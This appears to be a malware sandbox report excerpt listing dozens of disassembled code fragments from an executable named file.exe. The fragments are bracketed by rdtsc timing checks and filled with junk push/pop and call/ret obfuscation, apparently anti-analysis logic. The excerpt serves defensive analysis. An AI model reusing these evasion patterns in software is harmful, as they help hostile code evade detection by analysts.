                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05547 second address: A055F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F684908B758h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov bx, 09C5h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F684908B758h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 pushad 0x00000047 jmp 00007F684908B760h 0x0000004c js 00007F684908B768h 0x00000052 jmp 00007F684908B762h 0x00000057 popad 0x00000058 jng 00007F684908B75Ch 0x0000005e xor dword ptr [ebp+122D2280h], ecx 0x00000064 push 00000000h 0x00000066 call 00007F684908B75Ch 0x0000006b pop ebx 0x0000006c xchg eax, esi 0x0000006d push ebx 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05712 second address: A05718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05718 second address: A0571C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0571C second address: A05720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9664 second address: 9B9670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F684908B756h 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05720 second address: A0574D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F684904922Ch 0x00000010 jg 00007F6849049226h 0x00000016 pushad 0x00000017 jmp 00007F6849049234h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9670 second address: 9B9674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0574D second address: A057BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D3AB7h] 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F6849049228h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 sbb ebx, 0BA96A12h 0x0000003b mov eax, dword ptr [ebp+122D0425h] 0x00000041 sbb ebx, 334BA29Bh 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D3B7Bh] 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F6849049232h 0x00000057 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A057BC second address: A057C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08BCE second address: A08BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049233h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A057C2 second address: A057C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ABEF second address: A0ABF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09DC3 second address: A09DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ABF3 second address: A0ABF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ABF9 second address: A0AC0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684908B761h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AC0E second address: A0AC12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BC17 second address: A0BC26 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BC26 second address: A0BC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F6849049228h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 jg 00007F684904922Ch 0x00000029 push 00000000h 0x0000002b mov di, ax 0x0000002e xchg eax, esi 0x0000002f push edi 0x00000030 jo 00007F6849049228h 0x00000036 pushad 0x00000037 popad 0x00000038 pop edi 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F684904922Ch 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BC7A second address: A0BC7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DC35 second address: A0DC3F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6849049226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E224 second address: A0E26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F684908B758h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F684908B758h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D3588h], esi 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+124565F9h], ebx 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E26D second address: A0E271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BED3 second address: A0BEDD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1229F second address: A122B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F684904922Ch 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A122B6 second address: A122C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F684908B756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A122C0 second address: A12305 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F6849049228h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 pushad 0x00000024 sbb ebx, 3F9BB2A6h 0x0000002a mov ebx, dword ptr [ebp+122D3BB3h] 0x00000030 popad 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 mov bh, 45h 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jns 00007F6849049228h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A131DE second address: A131E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A131E3 second address: A13252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6849049228h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov di, 0554h 0x00000028 jnc 00007F684904922Ch 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F6849049228h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov di, si 0x0000004d push 00000000h 0x0000004f mov edi, dword ptr [ebp+122D3B7Bh] 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13252 second address: A13258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13258 second address: A1325E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1325E second address: A13277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F684908B75Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A105DE second address: A105E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12479 second address: A1248B instructions: 0x00000000 rdtsc 0x00000002 je 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F684908B756h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15288 second address: A152A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6849049238h 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A152A7 second address: A15338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F684908B763h 0x00000011 pop edi 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D3664h], ebx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F684908B758h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 cmc 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F684908B758h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 jmp 00007F684908B763h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F506 second address: A0F50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F50E second address: A0F51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jnp 00007F684908B756h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1340C second address: A13410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1351A second address: A13541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jl 00007F684908B756h 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F684908B763h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14457 second address: A1445D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154A3 second address: A154BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B763h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154BB second address: A154CE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6849049228h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154CE second address: A154D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154D2 second address: A154E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049232h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154E8 second address: A154F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F684908B756h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A154F2 second address: A15599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049234h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6849049228h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D1E45h] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F684904922Eh 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov eax, dword ptr [ebp+122D04C9h] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F6849049228h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Dh 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f push FFFFFFFFh 0x00000061 clc 0x00000062 mov edi, dword ptr [ebp+122D394Fh] 0x00000068 nop 0x00000069 jo 00007F6849049232h 0x0000006f jno 00007F684904922Ch 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pushad 0x0000007a popad 0x0000007b pop ebx 0x0000007c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18B96 second address: A18BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F684908B769h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F684908B768h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18BD4 second address: A18BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6849049237h 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE7D0 second address: 9BE7F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F684908B765h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE7F1 second address: 9BE7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE7F5 second address: 9BE7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE7FF second address: 9BE816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6849049233h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3A4 second address: A1F3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F684908B756h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F652 second address: A1F659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A0E second address: A24A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B767h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F684908B760h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A4A second address: A24A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A4E second address: A24A5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A5C second address: A24A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A60 second address: A24A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F684908B75Ch 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29772 second address: A2977E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6849049226h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2977E second address: A29784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A284B9 second address: A284D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6849049234h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A284D2 second address: A284DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A9B second address: A28AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28D24 second address: A28D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28D2D second address: A28D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28D37 second address: A28D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B764h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28D51 second address: A28D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28EA2 second address: A28ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F684908B763h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F684908B767h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28ED6 second address: A28EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2902D second address: A29039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F684908B756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29462 second address: A29476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB21E second address: 9BB231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F684908B756h 0x00000009 jo 00007F684908B756h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB231 second address: 9BB24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F684904922Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB24A second address: 9BB256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F684908B756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB256 second address: 9BB260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB260 second address: 9BB266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB266 second address: 9BB276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F6849049226h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DB7F second address: A2DB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
